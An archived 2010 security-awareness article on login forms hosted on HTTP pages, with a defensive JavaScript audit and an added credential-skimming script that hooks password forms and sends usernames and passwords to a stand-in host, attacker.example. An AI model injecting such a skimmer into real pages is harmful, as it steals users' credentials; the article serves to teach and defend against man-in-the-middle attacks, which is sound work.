Submitted URL: http://stealmylogin.com/
Effective URL: https://www.stealmylogin.com/

This page is an archived article, more than ten years old, and is severely
outdated. Since its publication in 2010, the companies mentioned below and
practically the entire web have moved their login forms, and often their entire
sites, to HTTPS. Still, this historical article shows how even big companies
can fail to follow security best practices and, as a result, endanger their
customers.


STEAL MY LOGIN

written by Alex Sirota

Exposing the dangers of insecure login forms





INTRO

We often browse the web over an insecure connection, for example on a public
Wi-Fi hotspot, or behind a router configured to use an insecure protocol. This
exposes us to man-in-the-middle attacks, in which an attacker sitting between
the browser and the website tries to steal login details, passwords and other
sensitive data.

There is a simple solution: whenever sensitive information is sent, the website
should use a secure protocol such as HTTPS. An attacker listening on the
connection then sees only encrypted traffic that they cannot decrypt. You know
that your connection to a page is secure when its address starts with 'https:'
and your browser displays a lock icon and similar UI cues.


THE PROBLEM

Most websites have implemented a secure way to send login information, but the
implementation is often flawed and still lets an attacker steal your login
details.

For a secure login form to protect you, both the page that displays the form
and the page the form submits to must be served over HTTPS.

Many of the biggest sites on the Web host the actual login form on a non-HTTPS
page, even though they submit the login details to an HTTPS page.

An attacker who can tamper with your traffic can easily inject code into the
non-HTTPS page that hosts the login form and steal your details just before
they are securely submitted.
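A check for the rule above, as an added example that is not from the original article: it resolves a form's action attribute against the page URL the way the browser does and reports whether the pair (page URL, submit target) meets the rule. The URLs in the demonstration are constructed sample inputs; to run it against a real page from the browser console, pass location.href and each form's getAttribute('action') (not form.action, which the browser has already resolved).

```javascript
// Added example: audit a login form against the rule that both the page
// showing the form and the form's target must be HTTPS. All URLs below are
// constructed sample inputs; nothing is fetched.

// Resolve a form's action attribute the way the browser does: a missing or
// empty action submits to the page itself, a relative path resolves against
// the page URL, and a scheme-relative "//host/path" inherits the page's
// scheme, so on an HTTP page it stays HTTP.
function resolveAction(pageUrl, action) {
  if (action === undefined || action === null || action === "") {
    return new URL(pageUrl);
  }
  return new URL(action, pageUrl);
}

// Verdicts:
//   "secure"           page and target are both HTTPS
//   "form-on-http"     HTTP page, HTTPS target: the flaw this article is about;
//                      an attacker who rewrites the page reads the fields
//                      before they are encrypted
//   "plaintext-submit" the target is not HTTPS, so credentials leave the
//                      browser unencrypted (worse; also covers an HTTPS page
//                      whose form posts to HTTP)
function classifyLoginForm(pageUrl, action) {
  const pageSecure = new URL(pageUrl).protocol === "https:";
  const targetSecure = resolveAction(pageUrl, action).protocol === "https:";
  if (pageSecure && targetSecure) return "secure";
  if (!targetSecure) return "plaintext-submit";
  return "form-on-http";
}

// Audit every form on a page. `forms` is a list of { action, hasPassword }
// descriptors; in a browser build it from document.forms, using
// form.getAttribute("action") for the raw attribute and
// form.querySelector("input[type=password]") !== null for hasPassword.
function auditPage(pageUrl, forms) {
  return forms
    .filter(f => f.hasPassword)
    .map(f => ({
      target: resolveAction(pageUrl, f.action).href,
      verdict: classifyLoginForm(pageUrl, f.action),
    }));
}

// Constructed page resembling the offenders in the article: an HTTP page
// carrying a login form that posts to HTTPS, a harmless search form, and a
// second login form with a scheme-relative action that silently stays HTTP.
function demo() {
  return auditPage("http://www.example.com/", [
    { action: "https://www.example.com/login", hasPassword: true },
    { action: "/search", hasPassword: false },
    { action: "//www.example.com/signin", hasPassword: true },
  ]);
}
```

The scheme-relative case is worth noting: a form whose action is written as "//host/login" looks like it targets the secure host, but on an HTTP page it submits over HTTP, so it is classified as a plaintext submission rather than as the milder form-on-HTTP case.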


DEMO

Check out the StealMyLogin demo. As on many sites, the demo's login form sits
on a non-HTTPS page and is securely submitted to an HTTPS page.

If you look at the source code of the demo page, you'll see that we injected a
malicious JavaScript file, stealmylogin.js, into the page, just as an attacker
might. This code steals the login details just before they are securely
submitted to the service.
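The injected script described in this section and in "The Problem" above, as an added example that is not the site's own stealmylogin.js: it hooks every form that contains a password field, copies the field values into a request to an attacker-controlled URL (here the hypothetical http://attacker.example/collect), and then lets the HTTPS submission continue so the victim notices nothing. The page and forms below are a constructed stand-in for the DOM so that the example runs under Node without a browser; in a browser the same hookLoginForms function would be called with document and an exfiltration callback such as url => { new Image().src = url; }.

```javascript
// Added example: a model of the script an attacker injects into an HTTP page
// that hosts a login form. Not the article's stealmylogin.js.

// Hypothetical attacker endpoint; any host the attacker controls would do.
const COLLECT_URL = "http://attacker.example/collect";

// Encode the stolen fields as a GET query, the way a 2010-era script would so
// that simply creating an <img> makes the victim's browser deliver them.
function buildExfilUrl(fields) {
  return COLLECT_URL + "?" + new URLSearchParams(fields).toString();
}

// Attach a capturing submit listener to every form that has a password field.
// The listener runs before the browser sends the form, hands the field values
// to the attacker, and deliberately does not call preventDefault(), so the
// genuine submission to the HTTPS action still happens.
function hookLoginForms(doc, sendToAttacker) {
  const hooked = [];
  for (const form of doc.querySelectorAll("form")) {
    const inputs = Array.from(form.querySelectorAll("input"));
    if (!inputs.some(i => i.type === "password")) continue;
    form.addEventListener("submit", () => {
      const fields = {};
      for (const input of inputs) {
        const wanted = input.type === "text" || input.type === "email" || input.type === "password";
        if (input.name && wanted) fields[input.name] = input.value;
      }
      sendToAttacker(buildExfilUrl(fields));
    }, true);
    hooked.push(form);
  }
  return hooked;
}

// Constructed stand-in for the DOM so the example runs without a browser: a
// form remembers its submit listeners and fires them when submitted.
function fakeForm(action, inputs) {
  const listeners = [];
  return {
    action,
    querySelectorAll: sel => (sel === "input" ? inputs : []),
    addEventListener: (type, fn) => { if (type === "submit") listeners.push(fn); },
    submit() {
      listeners.forEach(fn => fn({ type: "submit" }));
      return "submitted to " + action;
    },
  };
}
function fakeDocument(forms) {
  return { querySelectorAll: sel => (sel === "form" ? forms : []) };
}

// Demonstration on a constructed page shaped like the article's demo: plain
// HTTP page, login form posting to HTTPS, attacker's script already injected.
function demo() {
  const stolen = [];
  const loginForm = fakeForm("https://www.example.com/login", [
    { name: "username", type: "text", value: "alice" },
    { name: "password", type: "password", value: "s3cret" },
    { name: "remember", type: "checkbox", value: "on" },
  ]);
  const searchForm = fakeForm("http://www.example.com/search", [
    { name: "q", type: "text", value: "cats" },
  ]);
  const doc = fakeDocument([searchForm, loginForm]);
  const hooked = hookLoginForms(doc, url => stolen.push(url));
  const result = loginForm.submit();
  return { hookedCount: hooked.length, stolen, result };
}
```

The point to take from the model is where the theft happens: the fields are read inside the browser, before any encryption, so the HTTPS action on the form buys nothing once the page that carries the form has been modified in transit. Serving the form page itself over HTTPS is what denies the attacker the ability to modify it.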


BOOKMARKLET

Want to try this attack yourself on one of your favorite websites? Just drag
the following link StealMyLogin to your browser's toolbar, navigate to a
non-HTTPS page that has a login form, click the bookmarklet to simulate an
attacker injecting malicious code into the page, and then log in to the
service.


LIST OF OFFENDERS

This is obviously a very partial list, but it's amazing how many of the biggest
sites on the Web have this significant security flaw.
 * LinkedIn
 * Twitter
 * Facebook
 * AT&T
 * Netflix
 * GoDaddy
 * Progressive
 * Tivo
 * UPS


ADDITIONAL BACKGROUND

Some assumptions:
 1. There are bad people out there looking to steal your bank or credit card
    information, your money and your identity.
 2. Many people use the same password and username in many different online
    services, including banks.
 3. Malicious attackers will try to get your login information for any of the
    services you're using, which will then allow them to break into the rest.

There are several ways an attacker can try to steal your login information,
such as:

 * Phishing - sending you an email linking to a fake site that looks like the
   real thing.
 * Cross-site scripting (XSS) - exploiting a vulnerability in a website to
   inject custom JavaScript code that would then try to steal your info.
 * Man-in-the-middle attack - listening to information flowing through an
   insecure data connection (like a malicious "free" wifi hotspot), potentially
   injecting malicious code into the visited websites.

Here, we are discussing the last type of attack - Man-in-the-middle.



Tags: security, identity theft, phishing, https, ssl, login form, username,
passwords
Copyright © 2010 Alex Sirota